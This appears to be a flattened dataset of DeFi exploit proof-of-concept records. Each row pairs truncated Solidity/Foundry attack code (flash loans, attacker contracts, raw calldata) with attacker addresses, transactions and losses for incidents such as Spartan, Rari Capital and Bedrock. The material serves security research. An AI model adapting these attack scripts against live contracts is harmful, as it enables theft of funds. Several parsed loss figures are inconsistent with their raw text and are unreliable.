source_code
stringlengths
878
31.2k
type
stringclasses
1 value
protocol
stringlengths
2
33
date
stringclasses
70 values
file_name
stringlengths
10
41
attack_vector
stringclasses
4 values
content_hash
stringlengths
16
16
collected_at
stringdate
2026-01-07 10:59:16
2026-01-07 10:59:16
_source
stringclasses
1 value
chain
stringclasses
8 values
block_number
int64
1.11M
356M
total_lost_raw
stringlengths
3
127
total_lost_usd
float64
0
19,026B
attacker_address
stringlengths
65
82
attack_contract
stringlengths
70
89
vulnerable_contract
stringlengths
68
82
attack_tx
stringlengths
89
115
postmortem_url
stringclasses
85 values
twitter_url
stringlengths
48
62
has_keyinfo
bool
2 classes
has_analysis
bool
2 classes
has_attack_vector
bool
2 classes
severity
stringclasses
4 values
severity_raw
stringlengths
3
127
category
stringclasses
5 values
exploit_code
stringlengths
0
25.5k
has_exploit_code
bool
2 classes
keyinfo_total_lost
stringlengths
0
127
keyinfo_attacker
stringlengths
0
82
keyinfo_attack_contract
stringlengths
0
89
keyinfo_vulnerable_contract
stringlengths
0
82
keyinfo_attack_tx
stringlengths
0
115
analysis_postmortem
stringclasses
82 values
analysis_twitter
stringlengths
0
62
funds_lost_formatted
stringlengths
2
13
content_richness_score
float64
0.63
10
quality_estimate
stringclasses
3 values
title
stringlengths
20
51
has_total_lost
bool
2 classes
has_vulnerable_contract
bool
2 classes
has_attack_tx
bool
2 classes
has_postmortem
bool
2 classes
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ 95.5 K (1.14015390 WBTC) // Original Attacker : 0xF6ffBa5cbF285824000daC0B9431032169672B6e // MEV frontrunner : Yoink(0xFDe0d1575Ed8E06FBf36256bcdfA1F359281455A) // Atta...
exploit_poc
Alkimiya_io
2025-03
Alkimiya_io_exp.sol
flash_loan
833fdf55c15f2114
2026-01-07T10:59:16.532979
postmortems
ethereum
22,146,340
~ 95.5 K (1.14015390 WBTC)
95,500
null
https://etherscan.io/address/0x80bf7db69556d9521c03461978b8fc731dbbd4e4
https://etherscan.io/address/0xf3f84ce038442ae4c4dcb6a8ca8bacd7f28c9bde
https://etherscan.io/tx/0x9b9a6dd05526a8a4b40e5e1a74a25df6ecccae6ee7bf045911ad89a1dd3f0814
null
null
true
false
true
medium
~ 95.5 K (1.14015390 WBTC)
flash-loan
function testPoC() public { vm.startPrank(attacker); AttackerC attC = new AttackerC(); attC.attack(); console2.log("Profit:", IFS(WBTC).balanceOf(address(attC)), 'WBTC'); } } contract AttackerC { uint256 id;
true
~ 95.5 K (1.14015390 WBTC)
https://etherscan.io/address/0x80bf7db69556d9521c03461978b8fc731dbbd4e4
https://etherscan.io/address/0xf3f84ce038442ae4c4dcb6a8ca8bacd7f28c9bde
https://etherscan.io/tx/0x9b9a6dd05526a8a4b40e5e1a74a25df6ecccae6ee7bf045911ad89a1dd3f0814
$95.5K
9.08
high
Alkimiya_io Exploit (2025-03)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.17; import "forge-std/Test.sol"; // @KeyInfo - Total Lost: $30.5M // Attacker: 0x3b6e77722e2bbe97c1cfa337b42c0939aeb83671 // Attack Contract: 0x288315639c1145f523af6d7a5e4ccf8238cd6a51 // Vulnerable Contract: 0x3de669c4f1f167a8afbc9993e4753b84b576426f // Att...
exploit_poc
Spartan
2021-05
Spartan_exp.sol
flash_loan
7386f7bff4182bd1
2026-01-07T10:59:16.533030
postmortems
unknown
7,048,832
$30.5M
30,500,000
null
null
null
https://explorer.phalcon.xyz/tx/bsc/0xb64ae25b0d836c25d115a9368319902c972a0215bd108ae17b1b9617dfb93af8?line=0
null
null
true
false
true
critical
$30.5M
flash-loan
function testExploit() public { CAKE_WBNB.swap(0, 100_000 ether, address(this), "flashloan 100k WBNB"); }
true
$30.5M
https://explorer.phalcon.xyz/tx/bsc/0xb64ae25b0d836c25d115a9368319902c972a0215bd108ae17b1b9617dfb93af8?line=0
$30.50M
8.53
high
Spartan Exploit (2021-05)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 1.5M // Attacker : https://bscscan.com/address/0xc3bc29941677db01b9645f7b8b72d27e3ba75372 // Attack Contract : https://bscscan.com/address/0x7c591aab9429af81287951872595a17d5...
exploit_poc
JulSwap
2021-05
JulSwap_exp.sol
null
adebf2c42e8c56fd
2026-01-07T10:59:16.533087
postmortems
bsc
null
1.5M
1,500,000
https://bscscan.com/address/0xc3bc29941677db01b9645f7b8b72d27e3ba75372
https://bscscan.com/address/0x7c591aab9429af81287951872595a17d5837ce03
https://bscscan.com/address/0x32dffc3fe8e3ef3571bf8a72c0d0015c5373f41d
https://bscscan.com/tx/0x1751268e620767ff117c5c280e9214389b7c1961c42e77fc704fd88e22f4f77a
null
null
true
true
false
critical
1.5M
unknown
function testExploit() public balanceLog { //implement exploit code here uint256 amount0Out = 70_000_000_000_000_000_000_000; uint256 amount1Out = 0; IUniswapV2Pair(BSCswapPair).swap(amount0Out, amount1Out, address(this), "1"); }
true
1.5M
https://bscscan.com/address/0xc3bc29941677db01b9645f7b8b72d27e3ba75372
https://bscscan.com/address/0x7c591aab9429af81287951872595a17d5837ce03
https://bscscan.com/address/0x32dffc3fe8e3ef3571bf8a72c0d0015c5373f41d
https://bscscan.com/tx/0x1751268e620767ff117c5c280e9214389b7c1961c42e77fc704fd88e22f4f77a
$1.50M
7.61
medium
JulSwap Exploit (2021-05)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; /** * Exploit: * Tx 1 : https://bscscan.com/tx/0x88fcffc3256faac76cde4bbd0df6ea3603b1438a5a0409b2e2b91e7c2ba3371a * Attacker zaps 1 BNB into WBNB-USDT VaultFlipToFlip * * harvest()...
exploit_poc
PancakeBunny
2021-05
PancakeBunny_exp.sol
flash_loan
17527a36b6a4efc3
2026-01-07T10:59:16.533141
postmortems
bsc
7,556,330
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { payable(WBNB).call{value: 1e18}(""); emit log_named_decimal_uint( "Initial WBNB balance of attacker:", IERC20(WBNB).balanceOf(address(this)), IERC20(WBNB).decimals() ); emit log_named_decimal_uint( "Initial USDT balance of attacker...
true
Unknown
6
medium
PancakeBunny Exploit (2021-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 11M // Attacker : https://bscscan.com/address/0x47f341d896b08daacb344d9021f955247e50d089 // Attack Contract : https://bscscan.com/address/0xef39f14213714001456e2e89eddbdf8c8...
exploit_poc
bEarn
2021-05
bEarn_exp.sol
flash_loan
97e91b898243c028
2026-01-07T10:59:16.533241
postmortems
bsc
null
11M
11,000,000
https://bscscan.com/address/0x47f341d896b08daacb344d9021f955247e50d089
https://bscscan.com/address/0xef39f14213714001456e2e89eddbdf8c850c3be6
https://bscscan.com/address/0xb390b07fcf76678089cb12d8e615d5fe494b01fb
https://bscscan.com/tx/0x603b2bbe2a7d0877b22531735ff686a7caad866f6c0435c37b7b49e4bfd9a36c
https://bearndao.medium.com/bvaults-busd-alpaca-strategy-exploit-post-mortem-and-bearn-s-compensation-plan-b0b38c3b5540
null
true
true
true
critical
11M
flash-loan
function testExploit() public balanceLog { //implement exploit code here address receiver = address(this); uint256 amount = ICreamFi(CreamFi).getCash(); ICreamFi(CreamFi).flashLoan(receiver, amount, "1"); }
true
11M
https://bscscan.com/address/0x47f341d896b08daacb344d9021f955247e50d089
https://bscscan.com/address/0xef39f14213714001456e2e89eddbdf8c850c3be6
https://bscscan.com/address/0xb390b07fcf76678089cb12d8e615d5fe494b01fb
https://bscscan.com/tx/0x603b2bbe2a7d0877b22531735ff686a7caad866f6c0435c37b7b49e4bfd9a36c
https://bearndao.medium.com/bvaults-busd-alpaca-strategy-exploit-post-mortem-and-bearn-s-compensation-plan-b0b38c3b5540
$11.00M
8.21
high
bEarn Exploit (2021-05)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.17; import "forge-std/Test.sol"; // Attacker: 0x6c9f2b95ca3432e5ec5bcd9c19de0636a23a4994 // Attack Contract: 0xae0f538409063e66ff0e382113cb1a051fc069cd // Objective: Drain funds in the vulnerable Burger LP contract: 0x7ac55ac530f2c29659573bde0700c6758d69e677...
exploit_poc
BurgerSwap
2021-05
BurgerSwap_exp.sol
flash_loan
49e19e7f6d6dbc56
2026-01-07T10:59:16.533285
postmortems
bsc
7,781,159
null
null
null
null
null
https://phalcon.xyz/tx/bsc/0xac8a739c1f668b13d065d56a03c37a686e0aa1c9339e79fcbc5a2d0a6311e333
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { // BURGER and WBNB in Pair before: 164603 <> 3038 USDT_WBNB.swap(0, 6_047_132_230_250_298_663_393, address(this), "Flashloan 6047 WBNB"); // BURGER and WBNB in Pair after: 53606 <> 622 console.log("BURGER exploited:", BURGER.balanceOf(address(this)) / 1e1...
true
https://phalcon.xyz/tx/bsc/0xac8a739c1f668b13d065d56a03c37a686e0aa1c9339e79fcbc5a2d0a6311e333
Unknown
8
high
BurgerSwap Exploit (2021-05)
false
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* Attack tx: https://etherscan.com/tx/0x171072422efb5cd461546bfe986017d9b5aa427ff1c07ebe8acc064b13a7b7be Tenderly.co: https://dashboard.tenderly.co/tx/mainnet/0x171072422efb5cd461546bfe986...
exploit_poc
RariCapital
2021-05
RariCapital_exp.sol
null
83f41b9e9c1e7629
2026-01-07T10:59:16.533349
postmortems
unknown
12,394,009
null
null
null
null
null
https://etherscan.com/tx/0x171072422efb5cd461546bfe986017d9b5aa427ff1c07ebe8acc064b13a7b7be
null
null
false
false
false
medium
null
unknown
function testExploit() public { emit log_named_decimal_uint("[Start] ETH Balance of attacker", attacker.balance, 18); bytes memory data = hex"00000000000000000000000081796c4602b82054a727527cd16119807b8c76080000000000000000000000000000000000000000000000000000000000000040000000000000000000000...
true
Unknown
4.15
low
RariCapital Exploit (2021-05)
false
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* Attack tx: https://bscscan.com/tx/0xa00def91954ba9f1a1320ef582420d41ca886d417d996362bf3ac3fe2bfb9006 Tenderly.co: https://dashboard.tenderly.co/tx/bsc/0xa00def91954ba9f1a1320ef582420d41c...
exploit_poc
ValueDefi
2021-05
ValueDefi_exp.sol
null
a2010785f7605cf5
2026-01-07T10:59:16.533393
postmortems
bsc
7,223,029
null
null
null
null
null
https://bscscan.com/tx/0xa00def91954ba9f1a1320ef582420d41ca886d417d996362bf3ac3fe2bfb9006
null
null
false
false
false
medium
null
unknown
function testExploit() public { emit log_named_decimal_uint("[Start] WBNB Balance of attacker", wbnb.balanceOf(attacker), 18); bytes memory data = hex"000000000000000000000000e38ebfe8f314dcad61d5adcb29c1a26f41bed0be0000000000000000000000000000000000000000000000000000000000000040000000000000...
true
Unknown
4.33
low
ValueDefi Exploit (2021-05)
false
false
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 400k USD // Attacker : https://etherscan.io/address/0x67404bcd629E920100c594d62f3678340F40D95a // Attack Contract : https://etherscan.io/address/0xbe01c53AD466Ef011e3f8A67F6e23C34E2e9976C // Vulnerable Contract...
exploit_poc
PLN
2024-09
PLN_exp.sol
null
5531d8c6ec4fdda5
2026-01-07T10:59:16.533445
postmortems
ethereum
20,681,142
400k USD
400,000
https://etherscan.io/address/0x67404bcd629E920100c594d62f3678340F40D95a
https://etherscan.io/address/0xbe01c53AD466Ef011e3f8A67F6e23C34E2e9976C
https://etherscan.io/address/0xe0c218e1633a5c76d57ff4f11149f07bfff16aea
https://etherscan.io/tx/0xcc36283cee837a8a0d4af0357d1957dc561913e44ad293ea9da8acf15d874ed5
https://x.com/TenArmorAlert/status/1831525062253654300
https://x.com/TenArmorAlert/status/1831525062253654300
true
true
false
high
400k USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); attC.attack{value: 0.9 ether}(); vm.stopPrank(); emit log_named_decimal_uint(...
true
400k USD
https://etherscan.io/address/0x67404bcd629E920100c594d62f3678340F40D95a
https://etherscan.io/address/0xbe01c53AD466Ef011e3f8A67F6e23C34E2e9976C
https://etherscan.io/address/0xe0c218e1633a5c76d57ff4f11149f07bfff16aea
https://etherscan.io/tx/0xcc36283cee837a8a0d4af0357d1957dc561913e44ad293ea9da8acf15d874ed5
https://x.com/TenArmorAlert/status/1831525062253654300
https://x.com/TenArmorAlert/status/1831525062253654300
$400.0K
8.04
high
PLN Exploit (2024-09)
true
true
true
true
import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~8.8 WBNB // Attacker : 0x3026c464d3bd6ef0ced0d49e80f171b58176ce32 // Attack Contract : 0x1c4684b838cf4344c152ba18650d1524af4f0f12 // Vulnerable Contract : 0xc6a8c02dd5a3dd1616ec072bfc7c9d3df9682a63 // Attack Tx : https://bscscan.com/tx...
exploit_poc
MARA
2024-09
MARA_exp.sol
flash_loan
85f51227c4c7a8dd
2026-01-07T10:59:16.533494
postmortems
bsc
42,538,916
~8.8 WBNB
8.8
null
null
null
https://bscscan.com/tx/0x0fe3716431f8c2e43217c3ca6d25eed87e14d0fbfa9c9ee8ce4cef2e5ec4583c
null
null
true
false
true
low
~8.8 WBNB
flash-loan
false
~8.8 WBNB
https://bscscan.com/tx/0x0fe3716431f8c2e43217c3ca6d25eed87e14d0fbfa9c9ee8ce4cef2e5ec4583c
$9
5.53
medium
MARA Exploit (2024-09)
true
false
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 7K USD // Attacker : https://etherscan.io/address/0x7248939f65bdd23aab9eaab1bc4a4f909567486e // Attack Contract : https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1 // Vulnerable Contract :...
exploit_poc
DOGGO
2024-09
DOGGO_exp.sol
null
02122a120f36d5b4
2026-01-07T10:59:16.533552
postmortems
ethereum
20,794,802
7K USD
7,000
https://etherscan.io/address/0x7248939f65bdd23aab9eaab1bc4a4f909567486e
https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1
https://etherscan.io/address/0x240cd7b53d364a208ed41f8ced4965d11f571b7a
https://app.blocksec.com/explorer/tx/eth/0x9e074d70e4f9022cba33c1417a6f6338d8248b67d6141c9a32913ca567d0efca?line=0
https://x.com/TenArmorAlert/status/1837358462076080521
https://x.com/TenArmorAlert/status/1837358462076080521
true
true
false
low
7K USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); deal(address(attC), 3.78e-16 ether); attC.attack{value: 3.78e-16 ether}(); vm...
true
7K USD
https://etherscan.io/address/0x7248939f65bdd23aab9eaab1bc4a4f909567486e
https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1
https://etherscan.io/address/0x240cd7b53d364a208ed41f8ced4965d11f571b7a
https://app.blocksec.com/explorer/tx/eth/0x9e074d70e4f9022cba33c1417a6f6338d8248b67d6141c9a32913ca567d0efca?line=0
https://x.com/TenArmorAlert/status/1837358462076080521
https://x.com/TenArmorAlert/status/1837358462076080521
$7.0K
9
high
DOGGO Exploit (2024-09)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~1.4M USD // Attacker : 0x5766d1F03378f50c7c981c014Ed5e5A8124f38A4 // Attack Contract : 0x87EFb39a716860eCd2324A944Cb40EC5128e56Dd, 0xD9ad954Bea4ad65578904CEFE6Ee2A6EB13...
exploit_poc
Caterpillar_Coin_CUT
2024-09
Caterpillar_Coin_CUT_exp.sol
null
a965c43ab4a6ef0e
2026-01-07T10:59:16.533619
postmortems
bsc
42,131,697
~1.4M USD
1,400,000
null
null
null
null
null
null
true
true
false
critical
~1.4M USD
unknown
false
~1.4M USD
$1.40M
4.68
low
Caterpillar_Coin_CUT Exploit (2024-09)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; /* // @KeyInfo - Total Lost : 26k US$ // Attacker : 0x000000003704BC4ffb86000046721f44Ef3DBABe // Attack Contract : 0xd11eE5A6a9EbD9327360D7A82e40d2F8C314e985 // Vulnerable Contract : 0xF2c8e860ca12...
exploit_poc
OTSeaStaking
2024-09
OTSeaStaking_exp.sol
null
2e94e955d1778271
2026-01-07T10:59:16.533680
postmortems
ethereum
null
26k US$
26,000
null
null
null
null
null
null
true
true
false
medium
26k US$
unknown
function testExploit() public { OTSeaRevenueDistributor(otseaDist).distribute(); vm.startPrank(attackContract); for (uint256 i = 0; i < 14; i++) { uint256[] memory indexes = new uint256[](21); for (uint256 j = 0; j < 20; j++) { indexes[j] = j; ...
true
26k US$
$26.0K
5.99
medium
OTSeaStaking Exploit (2024-09)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @POC Author : [rotcivegaf](https://twitter.com/rotcivegaf) // Contrasts involved address constant agETH = 0xe1B4d34E8754600962Cd944B535180Bd758E6c2e; address constant balancerVault = 0xBA1222222...
exploit_poc
Penpiexyzio
2024-09
Penpiexyzio_exp.sol
flash_loan
06064918b9e1a99e
2026-01-07T10:59:16.533744
postmortems
unknown
20,671,878
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testPoC_A() public { attacker = new Attacker(); // First tx: 0x7e7f9548f301d3dd863eac94e6190cb742ab6aa9d7730549ff743bf84cbd21d1 attacker.createMarket(); // To pass `if (lastRewardBlock != block.number) {` of PendleMarketV3 contract vm.roll(block.number + 1); /...
true
Unknown
6
medium
Penpiexyzio Exploit (2024-09)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 4.1M VUSD, 7.35M XCN, 5K DAI, 0.23 WBTC, 50K USDT (>$3.8M USD) // Attacker : https://etherscan.io/address/0x680910cf5fc9969a25fd57e7896a14ff1e55f36b // Attack Contract : /...
exploit_poc
OnyxDAO
2024-09
OnyxDAO_exp.sol
flash_loan
d9606c3984a4206f
2026-01-07T10:59:16.533847
postmortems
ethereum
20,834,658
4.1M VUSD, 7.35M XCN, 5K DAI, 0.23 WBTC, 50K USDT (>$3.8M USD)
4,100,000
https://etherscan.io/address/0x680910cf5fc9969a25fd57e7896a14ff1e55f36b
null
null
https://etherscan.io/tx/0x46567c731c4f4f7e27c4ce591f0aebdeb2d9ae1038237a0134de7b13e63d8729
null
null
true
false
true
critical
4.1M VUSD, 7.35M XCN, 5K DAI, 0.23 WBTC, 50K USDT (>$3.8M USD)
flash-loan
function testPoC() public { vm.startPrank(attacker); AttackerC attackerC = new AttackerC(); // tx: attackerC.attack(); console.log("Final balance in VUSD :", IERC20(VUSD).balanceOf(address(attacker))); console.log("Final balance in XCN:", IERC20(XCN).balanceOf(address(a...
true
4.1M VUSD, 7.35M XCN, 5K DAI, 0.23 WBTC, 50K USDT (>$3.8M USD)
https://etherscan.io/address/0x680910cf5fc9969a25fd57e7896a14ff1e55f36b
https://etherscan.io/tx/0x46567c731c4f4f7e27c4ce591f0aebdeb2d9ae1038237a0134de7b13e63d8729
$4.10M
9
high
OnyxDAO Exploit (2024-09)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~404 WBNB // Attacker : 0x4645863205b47a0a3344684489e8c446a437d66c // Attack Contract : 0x8f921e27e3af106015d1c3a244ec4f48dbfcad14 // Vulnerable Contract : 0x564d4126af2...
exploit_poc
Bankroll
2024-09
Bankroll_exp.sol
null
1b331f126bbe735b
2026-01-07T10:59:16.533930
postmortems
bsc
42,481,611
~404 WBNB
404
null
null
null
null
null
null
true
true
false
low
~404 WBNB
unknown
false
~404 WBNB
$404
3.48
low
Bankroll Exploit (2024-09)
true
false
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 11,000 USD // Attacker : https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd // Attack Contract : https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd // Vulnerable Contra...
exploit_poc
INUMI
2024-09
INUMI_exp.sol
null
022b84787d2f57c9
2026-01-07T10:59:16.533976
postmortems
ethereum
20,729,548
11,000 USD
11
https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd
https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd
https://etherscan.io/address/0xdb27d4ff4be1cd04c34a7cb6f47402c37cb73459
https://etherscan.io/tx/0xbeef352f716973043236f73dd5104b9d905fd04b7fc58d9958ac5462e7e3dbc1
https://x.com/TenArmorAlert/status/1834504921561100606
https://x.com/TenArmorAlert/status/1834504921561100606
true
true
false
low
11,000 USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); deal(address(attC), 5.000000000000028 ether); attC.attack{value: 1.07297e-13 ether}()...
true
11,000 USD
https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd
https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd
https://etherscan.io/address/0xdb27d4ff4be1cd04c34a7cb6f47402c37cb73459
https://etherscan.io/tx/0xbeef352f716973043236f73dd5104b9d905fd04b7fc58d9958ac5462e7e3dbc1
https://x.com/TenArmorAlert/status/1834504921561100606
https://x.com/TenArmorAlert/status/1834504921561100606
$11
7.02
medium
INUMI Exploit (2024-09)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 4.9M USD // Attacker : https://etherscan.io/address/0xa3a64255484ad65158af0f9d96b5577f79901a1d // Attack Contract : https://etherscan.io/address/0xEd4B3d468DEd53a322A8B8280B6...
exploit_poc
Shezmu
2024-09
Shezmu_exp.sol
access_control
9dbc105d0975497c
2026-01-07T10:59:16.534023
postmortems
ethereum
null
4.9M USD
4,900,000
https://etherscan.io/address/0xa3a64255484ad65158af0f9d96b5577f79901a1d
https://etherscan.io/address/0xEd4B3d468DEd53a322A8B8280B6f35aAE8bC499C
https://etherscan.io/address/0x641249dB01d5C9a04d1A223765fFd15f95167924
https://etherscan.io/tx/0x39328ea4377a8887d3f6ce91b2f4c6b19a851e2fc5163e2f83bbc2fc136d0c71
https://medium.com/coinmonks/decoding-shezmus-4-9-million-exploit-10dc0266b25b
https://x.com/shoucccc/status/1837228053862437244
true
true
true
critical
4.9M USD
access-control
function testExploit() public balanceLog { //implement exploit code here AttackContract attackContract = new AttackContract(); attackContract.attack(); } } contract AttackContract { address attacker; constructor() { attacker = msg.sender; }
true
4.9M USD
https://etherscan.io/address/0xa3a64255484ad65158af0f9d96b5577f79901a1d
https://etherscan.io/address/0xEd4B3d468DEd53a322A8B8280B6f35aAE8bC499C
https://etherscan.io/address/0x641249dB01d5C9a04d1A223765fFd15f95167924
https://etherscan.io/tx/0x39328ea4377a8887d3f6ce91b2f4c6b19a851e2fc5163e2f83bbc2fc136d0c71
https://medium.com/coinmonks/decoding-shezmus-4-9-million-exploit-10dc0266b25b
https://x.com/shoucccc/status/1837228053862437244
$4.90M
8.44
high
Shezmu Exploit (2024-09)
true
true
true
true
// @KeyInfo - Total Lost : 110,000 USD // Attacker : https://bscscan.com/address/0x57ecf40b596274a985967e3f698437ae0a9600a0 // Attack Contract : https://bscscan.com/address/0x11bffb96daa9b0c47fef01401eb089549e87604e // Vulnerable Contract : https://bscscan.com/address/0x05c2dd9cf547c6cccf91245346e6e1bc9926cae7 // Atta...
exploit_poc
WXETA
2024-09
WXETA_exp.sol
null
490978270fa586a4
2026-01-07T10:59:16.534073
postmortems
bsc
42,284,161
110,000 USD
110
https://bscscan.com/address/0x57ecf40b596274a985967e3f698437ae0a9600a0
https://bscscan.com/address/0x11bffb96daa9b0c47fef01401eb089549e87604e
https://bscscan.com/address/0x05c2dd9cf547c6cccf91245346e6e1bc9926cae7
https://bscscan.com/tx/0x614da880bd46e98131accd9a83917abf3d56dac94caf13ae98eeff504eea3704
https://x.com/TenArmorAlert/status/1835494807495659645
https://x.com/TenArmorAlert/status/1835494807495659645
true
true
false
low
110,000 USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); vm.stopPrank(); emit log_named_decimal_uint("after attack: balance of attacker", addr...
true
110,000 USD
https://bscscan.com/address/0x57ecf40b596274a985967e3f698437ae0a9600a0
https://bscscan.com/address/0x11bffb96daa9b0c47fef01401eb089549e87604e
https://bscscan.com/address/0x05c2dd9cf547c6cccf91245346e6e1bc9926cae7
https://bscscan.com/tx/0x614da880bd46e98131accd9a83917abf3d56dac94caf13ae98eeff504eea3704
https://x.com/TenArmorAlert/status/1835494807495659645
https://x.com/TenArmorAlert/status/1835494807495659645
$110
7.63
medium
WXETA Exploit (2024-09)
true
true
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 100 USD // Attacker : https://bscscan.com/address/0xba35d089addac99a8e7bcd1a25712b1702623ae3 // Attack Contract : https://bscscan.com/address/0xd310431e98412eb9a7c66808478bf08fdea81e2a // Vulnerable Contract : ...
exploit_poc
unverified_766a
2024-09
unverified_766a_exp.sol
null
eb16b25a5749d71b
2026-01-07T10:59:16.534123
postmortems
bsc
42,357,807
100 USD
100
https://bscscan.com/address/0xba35d089addac99a8e7bcd1a25712b1702623ae3
https://bscscan.com/address/0xd310431e98412eb9a7c66808478bf08fdea81e2a
https://bscscan.com/address/0x766a0936ff0ad045d39871846194edbd5df63a58
https://app.blocksec.com/explorer/tx/bsc/0x73d459ad3c926f5247a2018197d13b2a0acbc1fc46e1e54525c210a46130a56b
https://x.com/TenArmorAlert/status/1836339028616188321
https://x.com/TenArmorAlert/status/1836339028616188321
true
true
false
low
100 USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); attC.attack{value: 3.52e-15 ether}(); vm.stopPrank(); emit log_named_decimal_...
true
100 USD
https://bscscan.com/address/0xba35d089addac99a8e7bcd1a25712b1702623ae3
https://bscscan.com/address/0xd310431e98412eb9a7c66808478bf08fdea81e2a
https://bscscan.com/address/0x766a0936ff0ad045d39871846194edbd5df63a58
https://app.blocksec.com/explorer/tx/bsc/0x73d459ad3c926f5247a2018197d13b2a0acbc1fc46e1e54525c210a46130a56b
https://x.com/TenArmorAlert/status/1836339028616188321
https://x.com/TenArmorAlert/status/1836339028616188321
$100
7.47
medium
unverified_766a Exploit (2024-09)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~1.7M US$ // Attacker : https://etherscan.io/address/0x2bFB373017349820dda2Da8230E6b66739BE9F96 // Attack Contract : https://etherscan.io/address/0x0C8da4f8B823bEe4D5dAb73...
exploit_poc
Bedrock_DeFi
2024-09
Bedrock_DeFi_exp.sol
flash_loan
d73edbf37249cabd
2026-01-07T10:59:16.534172
postmortems
ethereum
20,836,584
~1.7M US$
1,700,000
https://etherscan.io/address/0x2bFB373017349820dda2Da8230E6b66739BE9F96
https://etherscan.io/address/0x0C8da4f8B823bEe4D5dAb73367D45B5135B50faB
https://etherscan.io/address/0x047D41F2544B7F63A8e991aF2068a363d210d6Da
https://etherscan.io/tx/0x725f0d65340c859e0f64e72ca8260220c526c3e0ccde530004160809f6177940
null
null
true
false
true
critical
~1.7M US$
flash-loan
function testPoCMinimal() public { // Borrow 200 ether to the attacker vm.deal(attacker, 200e18); // The attacker mint 200 ETH to 200 uniBTC vm.startPrank(attacker); IFS(VulVault).mint{value: 200e18}(); // The attacker received 200 uniBTC(~BTC) for 200 ETH conso...
true
~1.7M US$
https://etherscan.io/address/0x2bFB373017349820dda2Da8230E6b66739BE9F96
https://etherscan.io/address/0x0C8da4f8B823bEe4D5dAb73367D45B5135B50faB
https://etherscan.io/address/0x047D41F2544B7F63A8e991aF2068a363d210d6Da
https://etherscan.io/tx/0x725f0d65340c859e0f64e72ca8260220c526c3e0ccde530004160809f6177940
$1.70M
9.47
high
Bedrock_DeFi Exploit (2024-09)
true
true
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : $1.7k // Attacker : https://etherscan.io/address/0xf073a21f0d68adacfff34d5b8df04550c944e348 // Attack Contract : https://etherscan.io/address/0xd683b81c2608980db90a6fd730153e04629ff1a3 // Vulnerable Contract : ...
exploit_poc
unverified_03f9
2024-09
unverified_03f9_exp.sol
null
